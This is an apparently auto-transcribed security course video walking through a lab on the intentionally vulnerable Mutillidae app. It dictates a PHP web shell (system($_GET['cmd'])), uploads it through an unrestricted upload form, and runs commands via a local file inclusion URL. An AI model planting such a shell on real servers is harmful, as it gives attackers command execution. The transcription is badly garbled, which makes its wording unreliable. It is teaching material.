6.3 Security Misconfiguration Lab Instructions Part 2
12 hours 9 minutes
Hey, everyone, welcome back to the course. So in the last video, we went ahead and set up our fire fox as well. A suburb. Sweet on what we did is we went ahead and submitted a vote on the system. So we submitted a vote with Kiss mit a cz well, as whatever initials you wanted to use in my case, I use I bury. Now we're back at birth. Sweet.
So we've already clicked the http
history town at the top left.
We do see the http Mattila day in there. And so what we're gonna do now is we're gonna write. Click on that and we're gonna click. You send a repeater option. So what we're gonna do is we're just gonna right click right here.
And this is select the scent to repeat, er, it's about 1/4 of the way down.
We'll click on that. You'll see the repeater tab lights up a little bit. We're gonna go ahead and click on that next,
and we'll see our information in here. Now, if you notice that, we'll see the kismet and then we'll see my initials again. I use the word Sai Berry, but you'll see that information in there?
Let's go back to our lab document. So we see that this was sent to the web application We used to get request here. Now, what we want to check for is if the web application server is actually vulnerable too,
uh, to this type of attack where we can change the type of request. So, for example, we could use a get request, or we could use a post request or whatever we want to use. We want to see if it's vulnerable to that.
So we're gonna do is we're gonna change the kismet. We're gonna change that to say Tell net, then just go ahead and change the initials as well of whatever used before it is changed into something else.
So let's go ahead and do that now. So we're gonna change kismet to be telnet.
All right? And now we're gonna change the initials. So I use cyber last time with issues like cap or something like that. This time, that'll be fine.
Are so our last step here. We want to click on the go button once we've made those changes. So go and click the go button here the top left.
And then we're gonna minimize the burbs, sweet soda, and minimize that and we'll go back to Firefox.
All right, so the next thing we're gonna do is in our vote section here, we're gonna select TCP dump, and then we're gonna click that submit vote button.
And what we want to look for is if we see any type of entry regarding the tell meant that we just put in and that we submitted to burp Suite with a post request. So let's go ahead and do that now.
So here, we're gonna select TCP dump,
and then we're just gonna click on submit, vote.
We'll give it a moment or so it should pull up force and update everything.
Now, again, the question is, do we see Tell Net in our results, it'll so we scroll down here? We look at our voting results. Do we see? Tell me.
All right, Well, it was gonna be easy One. Of course we do, right? At least on my end. I see Telnet. There s so we know where we were successful in running that.
So now what we're gonna do is just create a simple backdoor So we're gonna get this set up and we'll launch Kelly the terminal window in Cali. Lennox will go ahead and create the back or a file on, and then we'll upload it and go from there.
So let's go and do that now
so we'll screw back up here. We're gonna goto a loss on the left side here. So we're gonna go to the old Lost 2017. So we're here in step 43. We're gonna go to step. Excuse me? The last 2017 we'll go back to the A six security Miss Configuration, and then we're gonna go to the file uploads the unrestricted file upload option.
So let's go and do that now 2017
and then the a six again the securities configuration. Then we'll see the 2nd 1 from the bottom. Here is the unrestricted file upload.
Let's go ahead and click on that is gonna give you a little menu where you can upload a file.
So our next up here, we want to launch the Cali terminal. So we're gonna do that by clicking applications at the very top left of R. Kelly. Window
Under the applications will see favorites and then we'll see our terminal window right there is going to click on that might take a few seconds or so, but then it'll pull up a terminal window for us.
All right, so we see it there.
So now what we're gonna do is we're gonna take this long command here, so we're gonna do it step by step, like we've done in previous labs. We're gonna take our time and just go through. Make sure we type everything correctly. We'll go ahead and then run this command and we'll go back to fire Fox and we'll move forward in the lap from there.
So first things first, we're gonna start off with Echo, and then we're just gonna put in the single quotation mark,
We're gonna open up the tag here, so we'll use a little alligator symbol
and then the question work. So Echo Single Corporation will do the opening tag and then the question work.
So let's go and do that now. So echo,
Single quotation opening tag in question work.
All right, so now we're a type in PHP space system.
All right, so PHP
go back to our lab document so Now we're gonna type in the left parentheses, e the dollar sign and then the underscore symbol. And then the word get So we're gonna do parentheses, E dollar sign.
Underscore. Get. So let's go ahead and do that now.
So get no spacing here. Where do the left parentheses? E
dollar sign, underscore, and then get.
All right, let's go back to our lab document.
Now we're gonna type in a bracket here,
the quotation marks. So get a regular quotation mark,
and then we're gonna type in cnd and end it with a quotation in a bracket. So basically, we're in a type in brackets. Inside of that, we're gonna put quotation marks, and inside of those will put CMD.
So again, no spacing here and no spaces in between these
So Brackett, Quotation command, quotation and then bracket again.
All right, so now we're gonna end with our parentheses, Ian, A semi colon. So let's go and do that now. So And with our right? Prentiss Ian, a semi colon.
Let's go back to our lab document here. So now we're gonna type in the question, mark the closing tag there, and then the single quotation mark again.
So we put a space, will do a question mark.
Make sure didn't space to farther.
We'll put a space with a question mark.
We'll put our clothes and tag and we'll be quotation Mark.
Now we're gonna add one more quotation marks, will put a space and then add that, and then we'll move into the last part of this command.
So we just put a space here,
do another close and tag there. Now we can move into our last part of the command. So this last part here, we're just gonna put desktop forward slash backdoor dot PHP again, without specifying where this particular file is gonna be created at so and created on the desktop. So it's easier to find for us later.
So let's go and do that now. So desktop
Ford slashed back door
All right, Once we tight that, I just double check yourself. Make sure you talked everything correctly. If you had, we're gonna go ahead and just press enter, and then we'll run this command now. Nothing happened, right? What happened here? Well, it actually created the file for us. It doesn't tell us that, but we've created the file here.
Right. So we go back to fire Fox now.
So now we're Step 48 here. So we've cooked back on fire, Fox. Now we're gonna click the gray I con eso It's to the right of this file name box, and that's gonna allow us to select the file that we just created for upload. So let's go ahead and do that now. So we're gonna click this little grey box here,
take a moment or so Sometimes it's a little slow.
And there we go, and you see right away that highlights to file we just created so that someone we want back door dot PHP Once you have that highlighted, just click the open at the top, right?
That's just gonna open the file into the box here. And then we just clicked the upload file, but
all right, so
one question I have here for you do you see the file path that the backdoor PHP file has been moved to? So where has it been moved to? If you look at the results here.
All right, so we see it's been moved to the TNP Sylvester, the temp file attempt folder. It's been moved into there.
All right, so the next thing we're gonna do is to type this long, uh, entry in the U R l bar and press enter on. And then what we want to do is look for anything that says W w dashing data. What that's gonna show us is that if we want to run any command essentially, by replacing the cmd parameter of the command parameter, we could potentially gain full control over this particular operating system.
So let's go and do that. Now. We're just gonna take this commanding like we've always been doing. We're gonna do it nice and slow so everyone can follow along.
So just click in the U R l here. I always like to clear that out. And then just http tpp I was making up a new, uh, web thing. They're all right. Colin Ford size ford slash utility,
four slash Mattila day.
and then we're gonna finish out by saying index dot PHP question mark page. So let's go ahead. Do that. So index dot PHP question were paid. So put another ford slash index dot PHP question mark and then page, and then we'll finish out the rest of our command.
So not gonna do equals temp backdoor dot PHP.
So we're going to equals four slash TNP four slash backdoor dot PHP.
All right, we'll go back to our lab document here,
and they know where to put the end or the ampersand symbol. And then CMD equals I d.
We put. And essentially CND equals I d will put our efforts and there
cnd equals I d.
All right, So again, just double check yourself. Make sure you've typed everything correctly on your end. Once you have done so,
just go ahead and hit the enter key on your keyboard, but we'll see what kind of results we get back.
So again, the question being here Do you see any information? LaBella's, W W dash and data?
And obviously we see it's all in there, right? So again, if we see that, that means that we can alter the command here on potentially look around and take control its operating system. So, for example, if we just type d i r. We could see some various information in here about what files exists on this particular web application.
So in this video We just talked about security. Miss Kiefer sees me. Security, Miss Configuration. It's just a quick overview of what it looks like. And the next module we're gonna talk about cross site scripting.